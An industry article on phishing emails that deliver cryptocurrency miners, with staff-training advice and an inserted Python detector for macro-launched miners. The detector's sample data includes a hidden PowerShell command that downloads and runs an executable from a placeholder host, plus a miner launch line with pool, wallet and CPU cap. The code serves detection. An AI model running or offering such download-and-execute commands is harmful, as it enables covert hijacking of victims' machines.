
Watch out: rising malware attacks designed to mine cryptocurrencies

(Image credit: David McBee / Pexels)

The market for cryptocurrencies has been incredibly volatile, and as these digital currencies rise and fall in value the media has covered them persistently and interest hasn’t waned. Over the past year, articles followed the drastic swings in the price of bitcoin, the first cryptocurrency, from less than $1,000 to its peak at $19,783.21, as well as the promotion of cryptocurrency and its use for nefarious ends. Despite the often negative headlines, investment in bitcoin is still plentiful and people continue to mine the currency, which requires dedicated hardware and masses of computing power. Therein lies the route from cryptocurrency to phishing attack: hackers take control of victims’ devices, be that a computer, smartphone or games console, to mine cryptocurrency and collect the payment in return.

Phishing emails to mining botnets

Last year, Cofense observed more malware attacks designed to mine cryptocurrencies reported by our customers. This tracks with a Webroot study showing that since September 2017 over 5,000 websites have been compromised with CoinHive, a JavaScript miner that runs in visitors’ browsers and mines Monero by hijacking their CPU time. Cryptocurrency mining software is often delivered through phishing emails: clicking a malicious link or opening a weaponised attachment lets the attacker take control of the victim’s device without their knowledge and use its compute power to mine. Mining parallelises well, so the more devices an attacker controls the more they earn, but managing many infected machines by hand does not scale. Hackers have therefore built cryptominer botnets that task every compromised device with mining at once, each infected device becoming a bot in the network.

The illicit bots join mining pools, which split the proof-of-work across every participating device and pay out in proportion to the shares each contributes, so the botnet earns a steady trickle of currency instead of waiting to solve a block on its own. In summary, victim devices generate currency for the threat actor without their owners’ knowledge or permission, typically degrading the performance of the affected machines and driving up their power consumption.

In campaigns observed by Cofense, phishing emails delivered a Word document containing a macro that, when run, downloaded and executed a cryptominer executable. The macro then launched the miner with its configuration: the mining pool to join, the wallet address to which credit for successfully mined shares is paid, and runtime parameters such as a maximum CPU usage, typically set so the miner does not draw the user’s attention. The miner then starts on the proof-of-work computations that earn the cryptocurrency.
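The chain described above, a Word macro spawning a script host that fetches the miner and the miner then being launched with its pool, wallet and CPU cap, leaves a recognisable trail in process-creation logs. The Python below is an added example, not code from the original article or from Cofense’s products: it applies those two heuristics to a handful of constructed log lines. The log format, the hostnames and the miner’s flag names (-o for the pool, -u for the wallet, --max-cpu-usage for the throttle) are assumptions modelled on common open-source CPU miners, not taken from any specific sample.

```python
"""Heuristics for spotting a macro-launched cryptominer in process-creation logs.

Added illustration, not Cofense tooling. The log format, the hostnames and
the miner's flag names (-o pool, -u wallet, --max-cpu-usage) are assumptions
modelled on common open-source CPU miners, not taken from a specific sample.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# Office applications that have no normal reason to spawn script hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Script hosts and download utilities a macro typically abuses to fetch a payload.
SCRIPT_CHILDREN = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "certutil.exe", "bitsadmin.exe"}

# Mining-pool endpoint: stratum scheme, or host:port on a port pools commonly use.
POOL_RE = re.compile(r"stratum\+tcp://\S+|\b[\w.-]+:(?:3333|4444|5555|7777|14444)\b", re.I)
# Monero standard address: base58 (no 0, O, I, l), starts with 4 or 8, 95 characters.
XMR_WALLET_RE = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
# Throttling flags the macro passes so the miner stays below the user's notice.
CPU_FLAG_RE = re.compile(r"--?(?:max-cpu-usage|threads|cpu-priority)[= ]\d+", re.I)


@dataclass
class Event:
    parent: str   # parent process image name
    image: str    # new process image name
    cmdline: str  # full command line of the new process


def parse_event(line: str) -> Event:
    """Parse one constructed 'parent=... image=... cmdline=...' log line."""
    m = re.match(r"parent=(\S+)\s+image=(\S+)\s+cmdline=(.*)$", line)
    if not m:
        raise ValueError(f"unrecognised event line: {line!r}")
    return Event(m.group(1).lower(), m.group(2).lower(), m.group(3))


def miner_indicators(cmdline: str) -> List[str]:
    """Return the miner configuration markers present in a command line."""
    checks = (("pool endpoint", POOL_RE), ("monero wallet", XMR_WALLET_RE),
              ("cpu throttle flag", CPU_FLAG_RE))
    return [name for name, rx in checks if rx.search(cmdline)]


def assess(event: Event) -> List[str]:
    """Reasons an event looks like macro delivery or a miner launch; empty if benign."""
    reasons = []
    if event.parent in OFFICE_PARENTS and event.image in SCRIPT_CHILDREN:
        reasons.append(f"{event.parent} spawned {event.image} (macro-style delivery)")
    reasons.extend(miner_indicators(event.cmdline))
    return reasons


def triage(lines: List[str]) -> Dict[str, List[str]]:
    """Map each flagged image name to its reasons, skipping benign events."""
    flagged: Dict[str, List[str]] = {}
    for line in lines:
        ev = parse_event(line)
        reasons = assess(ev)
        if reasons:
            flagged[ev.image] = reasons
    return flagged


# Constructed sample: a 95-char base58 string standing in for a real Monero address.
SAMPLE_WALLET = "4" + "ZxY9" * 23 + "ab"

# Constructed process-creation events (not captured from a real incident).
SAMPLE_EVENTS = [
    # 1. the macro in the phishing document spawns PowerShell to fetch and run the miner
    "parent=winword.exe image=powershell.exe cmdline=powershell -nop -w hidden -c "
    "\"(New-Object Net.WebClient).DownloadFile('http://example.invalid/upd.exe',"
    "'C:\\Users\\Public\\upd.exe'); Start-Process C:\\Users\\Public\\upd.exe\"",
    # 2. the miner starts with the pool, wallet and CPU cap handed over by the macro
    "parent=powershell.exe image=upd.exe cmdline=upd.exe -o stratum+tcp://pool.example.invalid:4444 "
    f"-u {SAMPLE_WALLET} -p x --max-cpu-usage 50",
    # 3. and 4. ordinary activity that must not be flagged
    "parent=explorer.exe image=winword.exe cmdline=\"C:\\Program Files\\Microsoft Office\\WINWORD.EXE\" /n report.docx",
    "parent=services.exe image=svchost.exe cmdline=svchost.exe -k netsvcs -p",
]

if __name__ == "__main__":
    for image, reasons in triage(SAMPLE_EVENTS).items():
        print(f"{image}: {'; '.join(reasons)}")
```

The parent/child rule fires on the delivery step alone, because an Office application spawning PowerShell is suspicious regardless of what follows; the command-line rules fire on the miner itself. A pool port by itself is a weak signal (other services use those ports), so in practice a wallet address or a throttle flag alongside it is what makes the verdict solid.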

What devices are targeted? 

Mining requires a lot of processing power, a persistent internet connection and an uninterrupted power supply. Unsurprisingly, computers are therefore frequently targeted, as are games consoles and smartphones. PlayStation and Xbox, for example, have powerful graphics processing units (GPUs) and are designed for high performance, making them an attractive target for cryptomining.

While there are numerous social engineering techniques that can be used to entice a user into clicking a malicious link and falling victim to a phishing attack, gamers often share a profile that attackers can exploit. For example, hackers send emails centred on common gaming topics such as release-date news, luring victims into clicking a malicious link. Gamers may also be more likely to fall victim if the email appears to come from a legitimate source, such as a game publisher.

Despite their much lower compute power, hackers are increasingly targeting victims’ smartphones. For example, last Christmas Android apps available on Google Play were found to contain hidden mining code. In such cases, the mining JavaScript runs in the background, hiding the process from the user. While smartphone infections generate much less profit than computers or games consoles, because of the lower compute power, all of these devices are viable targets.

What can businesses do? 

A huge range of computers and connected devices reside within a business, and many of them support mission-critical operations. As such, they often have a significant amount of compute power, making them a key target for hackers who want to cryptomine. What’s more, the intricate web of networked corporate computers often lets an attacker elevate privileges and move laterally to bring even more machines into the botnet.

The best way to defend against these attacks is to build a comprehensive and collaborative defence. While technology is important for reducing the chance that employees receive a malicious email in the first place, businesses also need to invest in their workforce so that it becomes a strong line of defence.

It is vitally important to educate staff about email-based attacks and condition them to identify suspicious emails, as ultimately this builds resilience. Phishing simulations can be run regularly to get employees used to recognising suspicious emails, and technical integrations such as a ‘report’ button make it easier for them to know what to do when they receive a potential phishing email. Cofense’s data consistently shows that as employees report more, they become less susceptible: in 2017 reporting rates were up more than four percent year on year, while susceptibility rates dropped two percent.

Other tips for building workforce resilience to phishing include encouraging employees to think twice when they read emails, as offers that seem too good to be true often are. Attachments and downloads should also be viewed with caution, especially when they arrive in an unexpected email. Any email designed to play on an emotion, whether fear, curiosity or reward, should be scrutinised more than usual, as hackers often use this to cloud judgement. It is also best practice to verify anything you find suspicious. For example, if an email purports to come from a partner or consultant connected to something you’re working on, verify their name and contact details through a different source and reach out directly.

It is also important to keep employees informed about the phishing emails currently circulating. If businesses share the most up-to-date intelligence on what to look out for, employees can help IT teams catch malicious emails as early as possible and expel attackers from the network, all thanks to the real-time intelligence employees supply.

Given that more and more cryptocurrencies are being launched, there is likely to be an increase in phishing attacks designed to take control of computers for mining. In the last year alone, phishing attacks increased 65 percent worldwide, which makes conditioning users to be wise to suspicious emails fundamental to stopping attackers in their tracks. Defeating the hackers takes a team, and vigilant humans should be central to it.

Aaron Higbee, Co-Founder and CTO of Cofense


Aaron is the Co-Founder and CTO of Cofense (formerly PhishMe), Inc., directing all aspects of development and research that drive the feature set of this market-leading solution. The Cofense method for awareness training was incubated from consulting services provided by Intrepidus Group, a company that Aaron co-founded with Rohyt Belani in 2007.